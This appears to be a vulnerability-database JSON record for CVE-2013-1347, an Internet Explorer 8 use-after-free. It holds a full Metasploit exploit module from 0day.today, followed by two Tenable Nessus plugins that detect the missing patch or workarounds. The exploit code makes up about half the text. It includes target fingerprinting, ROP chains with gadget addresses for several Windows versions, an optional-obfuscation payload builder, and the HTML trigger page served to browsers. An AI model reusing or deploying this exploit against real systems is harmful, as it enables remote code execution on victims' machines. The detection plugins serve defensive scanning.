[{"lastseen": "2018-04-05T23:48:05", "description": "This Metasploit module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "edition": 2, "published": "2013-05-07T00:00:00", "type": "zdt", "title": "Microsoft Internet Explorer CGenericElement Object Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1347"], "modified": "2013-05-07T00:00:00", "id": "1337DAY-ID-20741", "href": "https://0day.today/exploit/description/20741", "sourceData": "##\r\n#\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"8.0\",\r\n :ua_maxver => \"8.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :rank => GoodRanking\r\n })\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\r\n use-after-free condition occurs when a CGenericElement object is freed, but a\r\n reference is kept on the Document and used again during rendering, an invalid\r\n memory that's controllable is used, and allows arbitrary code execution under the\r\n context of the user.\r\n\r\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\r\n the compromise of the Department of Labor (DoL) Website.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown',\r\n 'EMH',\r\n 'juan vazquez', #RCA\r\n 'sinn3r' #RCA\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1347' ],\r\n [ 'OSVDB', '92993' ],\r\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\r\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'Space' => 1024,\r\n 'DisableNops' => true\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\r\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\r\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\r\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"May 3 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n\r\n end\r\n\r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n ie_name = \"IE #{ie}\"\r\n\r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n when '5.2'\r\n os_name = 'Windows Server 2003'\r\n when '6.0'\r\n os_name = 'Windows Vista'\r\n when '6.1'\r\n os_name = 'Windows 7'\r\n else\r\n # OS not supported\r\n return nil\r\n end\r\n\r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def ie8_smil(my_target, p)\r\n\r\n case my_target['Rop']\r\n when :msvcrt\r\n case my_target.name\r\n when 'IE 8 on Windows XP SP3'\r\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\r\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\r\n when 'IE 8 on Windows Server 2003'\r\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\r\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\r\n end\r\n else\r\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\r\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\r\n end\r\n\r\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\r\n js_payload = Rex::Text.to_unescape(p)\r\n\r\n js = %Q|\r\n unicorn = unescape(\"ABCD\");\r\n unicorn2 = unescape(\"EEEE\");\r\n for (i=0; i < 2; i++) {\r\n unicorn += unescape(\"ABCD\");\r\n }unicorn += unescape(\"AB\");\r\n\r\n unicorn += unescape(\"#{js_payload}\");\r\n\r\n animvalues = unescape(\"#{align_esp}\");\r\n\r\n for (i=0; i < 0x70/4; i++) {\r\n if (i == 0x70/4-1) {\r\n animvalues += unescape(\"#{xchg_esp}\");\r\n }\r\n else {\r\n animvalues += unescape(\"#{align_esp}\");\r\n }\r\n }\r\n\r\n animvalues += unicorn;\r\n\r\n for(i = 0; i < 13; i++) {\r\n animvalues += \";red\";\r\n }\r\n |\r\n\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n\r\n return js\r\n end\r\n\r\n def junk(n=4)\r\n return rand_text_alpha(n).unpack(\"V\")[0].to_i\r\n end\r\n\r\n def nop\r\n return make_nops(4).unpack(\"V\")[0].to_i\r\n end\r\n\r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n\r\n # No rop. Just return the payload.\r\n return code if t['Rop'].nil?\r\n\r\n case t['Rop']\r\n when :msvcrt\r\n case t.name\r\n when 'IE 8 on Windows XP SP3'\r\n rop_gadgets =\r\n [\r\n 0x77c1e844, # POP EBP # RETN [msvcrt.dll]\r\n 0x77c1e844, # skip 4 bytes [msvcrt.dll]\r\n 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\r\n 0xffffffff,\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\r\n 0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\r\n 0x77c3048a, # POP EDI # RETN [msvcrt.dll]\r\n 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\r\n 0x77c46efb, # POP ESI # RETN [msvcrt.dll]\r\n 0x77c2aacc, # JMP [EAX] [msvcrt.dll]\r\n 0x77c3b860, # POP EAX # RETN [msvcrt.dll]\r\n 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\r\n 0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\r\n 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\r\n ].pack(\"V*\")\r\n when 'IE 8 on Windows Server 2003'\r\n rop_gadgets =\r\n [\r\n 0x77bb2563, # POP EAX # RETN\r\n 0x77ba1114, # <- *&VirtualProtect()\r\n 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\r\n junk,\r\n 0x77bb0c86, # XCHG EAX,ESI # RETN\r\n 0x77bc9801, # POP EBP # RETN\r\n 0x77be2265, # ptr to 'push esp # ret'\r\n 0x77bb2563, # POP EAX # RETN\r\n 0x03C0990F,\r\n 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)\r\n 0x77bb48d3, # POP EBX, RET\r\n 0x77bf21e0, # .data\r\n 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN\r\n 0x77bbfc02, # POP ECX # RETN\r\n 0x77bef001, # W pointer (lpOldProtect) (-> ecx)\r\n 0x77bd8c04, # POP EDI # RETN\r\n 0x77bd8c05, # ROP NOP (-> edi)\r\n 0x77bb2563, # POP EAX # RETN\r\n 0x03c0984f,\r\n 0x77bdd441, # SUB EAX, 03c0940f\r\n 0x77bb8285, # XCHG EAX,EDX # RETN\r\n 0x77bb2563, # POP EAX # RETN\r\n nop,\r\n 0x77be6591 # PUSHAD # ADD AL,0EF # RETN\r\n ].pack(\"V*\")\r\n end\r\n else\r\n rop_gadgets =\r\n [\r\n 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\r\n 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)\r\n 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]\r\n 0x7c3415a2, # JMP [EAX] [msvcr71.dll]\r\n 0xffffffff,\r\n 0x7c376402, # skip 4 bytes [msvcr71.dll]\r\n 0x7c351e05, # NEG EAX # RETN [msvcr71.dll]\r\n 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]\r\n 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]\r\n 0x7c344f87, # POP EDX # RETN [msvcr71.dll]\r\n 0xffffffc0, # Value to negate, will become 0x00000040\r\n 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]\r\n 0x7c34d201, # POP ECX # RETN [msvcr71.dll]\r\n 0x7c38b001, # &Writable location [msvcr71.dll]\r\n 0x7c347f97, # POP EAX # RETN [msvcr71.dll]\r\n 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]\r\n 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]\r\n 0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]\r\n # rop chain generated with mona.py\r\n ].pack(\"V*\")\r\n end\r\n\r\n rop_payload = rop_gadgets\r\n case t['Rop']\r\n when :msvcrt\r\n rop_payload << \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n else\r\n rop_payload << \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\r\n end\r\n rop_payload << code\r\n rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt\r\n\r\n return rop_payload\r\n end\r\n\r\n def load_exploit_html(my_target, cli)\r\n\r\n p = get_payload(my_target, cli)\r\n js = ie8_smil(my_target, p)\r\n\r\n html = %Q|\r\n <!doctype html>\r\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\r\n <head>\r\n <meta>\r\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\r\n </meta>\r\n\r\n <script>\r\n function helloWorld()\r\n {\r\n #{js}\r\n f0 = document.createElement('span');\r\n document.body.appendChild(f0);\r\n f1 = document.createElement('span');\r\n document.body.appendChild(f1);\r\n f2 = document.createElement('span');\r\n document.body.appendChild(f2);\r\n document.body.contentEditable=\"true\";\r\n f2.appendChild(document.createElement('datalist'));\r\n f1.appendChild(document.createElement('span'));\r\n f1.appendChild(document.createElement('table'));\r\n try{\r\n f0.offsetParent=null;\r\n }catch(e) {\r\n\r\n }f2.innerHTML=\"\";\r\n f0.appendChild(document.createElement('hr'));\r\n f1.innerHTML=\"\";\r\n\r\n CollectGarbage();\r\n\r\n try {\r\n a = document.getElementById('myanim');\r\n a.values = animvalues;\r\n }\r\n catch(e) {}\r\n }\r\n\r\n </script>\r\n </head>\r\n <body onload=\"eval(helloWorld());\">\r\n <t:ANIMATECOLOR id=\"myanim\"/>\r\n\r\n </body>\r\n </html>\r\n |\r\n\r\n return html\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n\r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = load_exploit_html(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-05] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20741"}], "nessus": [{"lastseen": "2021-02-01T06:15:02", "description": "The remote host is missing Internet Explorer (IE) Security Update\n2847204.\n\nThe installed version of IE is affected by a use-after-free\nvulnerability that could allow an attacker to execute arbitrary code.", "edition": 28, "published": "2013-05-15T00:00:00", "title": "MS13-038: Security Update for Internet Explorer (2847204)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1347"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS13-038.NASL", "href": "https://www.tenable.com/plugins/nessus/66413", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(66413);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2013-1347\");\n script_bugtraq_id(59641);\n script_xref(name:\"CERT\", value:\"237655\");\n script_xref(name:\"EDB-ID\", value:\"25294\");\n script_xref(name:\"MSFT\", value:\"MS13-038\");\n script_xref(name:\"MSKB\", value:\"2847204\");\n\n script_name(english:\"MS13-038: Security Update for Internet Explorer (2847204)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2847204.\n\nThe installed version of IE is affected by a use-after-free\nvulnerability that could allow an attacker to execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-038\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-038';\nkb = '2847204';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'1', win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"9.0.8112.20594\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"9.0.8112.16484\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22299\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18129\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.20594\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.16484\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23487\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19421\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23487\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23487\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-29T13:34:53", "edition": 3, "description": "The remote host is missing one of the workarounds referenced in KB 2847140. \n\nThe remote version of IE reportedly has a use-after-free flaw related to how CGenericElement objects are handled that could result in arbitrary code execution on the remote system.\n\nThis plugin has been deprecated due to the publication of MS13-038.\nMicrosoft has released updates that make the workarounds unnecessary.\nTo check for those, use Nessus plugin ID 66413.", "published": "2013-05-09T00:00:00", "type": "nessus", "title": "MS KB2847140: Vulnerability in Internet Explorer 8 Could Allow Remote Code Execution (deprecated)", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1347"], "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "modified": "2017-08-30T00:00:00", "id": "SMB_KB2847140.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=66329", "sourceData": "#@DEPRECATED@\n#\n# Disabled on 2013/05/15. Deprecated by smb_nt_ms13-038.nasl\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66329);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2017/08/30 19:28:47 $\");\n\n script_cve_id(\"CVE-2013-1347\");\n script_bugtraq_id(59641);\n script_osvdb_id(92993);\n script_xref(name:\"CERT\", value:\"237655\");\n script_xref(name:\"MSKB\", value:\"2847140\");\n\n script_name(english:\"MS KB2847140: Vulnerability in Internet Explorer 8 Could Allow Remote Code Execution (deprecated)\");\n script_summary(english:\"Checks if workarounds referenced in KB article have been applied.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote host is affected by a remote code execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing one of the workarounds referenced in KB\n2847140. \n\nThe remote version of IE reportedly has a use-after-free flaw related to\nhow CGenericElement objects are handled that could result in arbitrary\ncode execution on the remote system.\n\nThis plugin has been deprecated due to the publication of MS13-038.\nMicrosoft has released updates that make the workarounds unnecessary.\nTo check for those, use Nessus plugin ID 66413.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/advisory/2847140\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the IE settings workarounds suggested by Microsoft in the\nadvisory, or apply the MSHTML Shim workaround in the Microsoft\n'Fix it' solution.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:W/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/09\");\n \n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"microsoft_emet_installed.nasl\", \"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\nexit(0, 'This plugin has been deprecated. Use smb_nt_ms13-038.nasl (plugin ID 66413) instead.');\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude(\"smb_hotfixes.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\n\nif (hotfix_check_server_core() == 1)\n audit(AUDIT_WIN_SERVER_CORE);\n\n# Only IE 8 is affected\nversion = get_kb_item_or_exit(\"SMB/IE/Version\");\nv = split(version, sep:\".\", keep:FALSE);\nif (int(v[0]) != 8)\n exit(0, \"IE version \"+ version + \" is not known to be affected.\");\n\nregistry_init();\n\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\nsystemroot = hotfix_get_systemroot();\nif(!systemroot) audit(AUDIT_FN_FAIL, 'hotfix_get_systemroot');\n\nguid = '{d1bc5fb9-8846-4c1c-98d0-2d415d4c6df6}';\npath = get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\\" + guid);\nRegCloseKey(handle:hklm);\n\nif (isnull(path))\n path = systemroot + \"\\AppPatch\\Custom\\\" + guid + '.sdb';\n\n# Now make sure the file is in place\nif (hotfix_file_exists(path:path))\n{\n hotfix_check_fversion_end();\n exit(0, \"The host is not affected since the Microsoft 'Fix it' has been applied.\");\n}\n\n# hotfix_file_exists calls NetUseDel(close:FALSE), so we must reconnect\nregistry_init();\n\nemet_info = '';\n\nemet_installed = FALSE;\nemet_with_ie = FALSE;\n\nif (!isnull(get_kb_item(\"SMB/Microsoft/EMET/Installed\")))\n emet_installed = TRUE;\n\n# Check if EMET is configured with IE.\n# The workaround does not specifically ask to enable DEP\n# but if IE is configured with EMET, dep is enabled by default.\n\nemet_list = get_kb_list(\"SMB/Microsoft/EMET/*\");\nif (!isnull(emet_list))\n{\n foreach entry (keys(emet_list))\n {\n if (\"iexplore.exe\" >< entry && \"/dep\" >< entry)\n {\n dep = get_kb_item(entry);\n if (!isnull(dep) && dep == 1)\n emet_with_ie = TRUE;\n }\n }\n}\n\nif (!emet_installed)\n{\n emet_info =\n '\\n Microsoft Enhanced Mitigation Experience Toolkit (EMET) is not' +\n '\\n installed.';\n}\nelse if (emet_installed)\n{\n if (!emet_with_ie)\n {\n emet_info =\n '\\n Microsoft Enhanced Mitigation Experience Toolkit (EMET) is' +\n '\\n installed, however Internet Explorer is not configured with EMET.';\n }\n}\n\ninfo_user_settings = '';\n\n# check mitigation per user\nhku = registry_hive_connect(hive:HKEY_USERS, exit_on_fail:TRUE);\nsubkeys = get_registry_subkeys(handle:hku, key:'');\n\nforeach key (subkeys)\n{\n if ('.DEFAULT' >< key || 'Classes' >< key ||\n key =~ \"^S-1-5-\\d{2}$\") # skip built-in accounts\n continue;\n\n mitigation = FALSE;\n\n# \"Set Internet and Local intranet security zone settings to \"High\" to block ActiveX Controls and Active Scripting in these zones\"\n key_part_intranet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\CurrentLevel';\n key_part_internet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\CurrentLevel';\n\n value = get_registry_value(handle:hku, item:key + key_part_intranet);\n value1 = get_registry_value(handle:hku, item:key + key_part_internet);\n\n if (isnull(value) && isnull(value1))\n continue;\n\n # 0x00012000 = 73728 = High Security\n if (!isnull(value) && !isnull(value1) &&\n value == 73728 && value1 == 73728)\n mitigation = TRUE;\n\n# \"Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\"\n key_part_intranet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\1400';\n key_part_internet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\1400';\n\n value = get_registry_value(handle:hku, item:key + key_part_intranet);\n value1 = get_registry_value(handle:hku, item:key + key_part_internet);\n\n # 1 = prompt, 3 = disable\n if (!isnull(value) && !isnull(value1) &&\n (value == 1 || value == 3) && (value1 == 1 || value1 == 3))\n mitigation = TRUE;\n\n if (!mitigation)\n info_user_settings += '\\n ' + key + ' (Active Scripting Enabled)';\n}\n\nRegCloseKey(handle:hku);\n\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# check if user settings have been overriden by what is in HKLM\n# note: Security_HKLM_only can be set by group policy\nvalue = get_registry_value(handle:hklm, item:'SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Security_HKLM_only');\n\nif (info_user_settings != '' && !isnull(value) && value == 1)\n{\n mitigation = FALSE;\n\n# \"Set Internet and Local intranet security zone settings to \"High\" to block ActiveX Controls and Active Scripting in these zones\"\n key_part_intranet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\CurrentLevel';\n key_part_internet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\CurrentLevel';\n\n value = get_registry_value(handle:hklm, item:key_part_intranet);\n value1 = get_registry_value(handle:hklm, item:key_part_internet);\n\n # 0x00012000 = 73728 = High Security\n if (!isnull(value) && 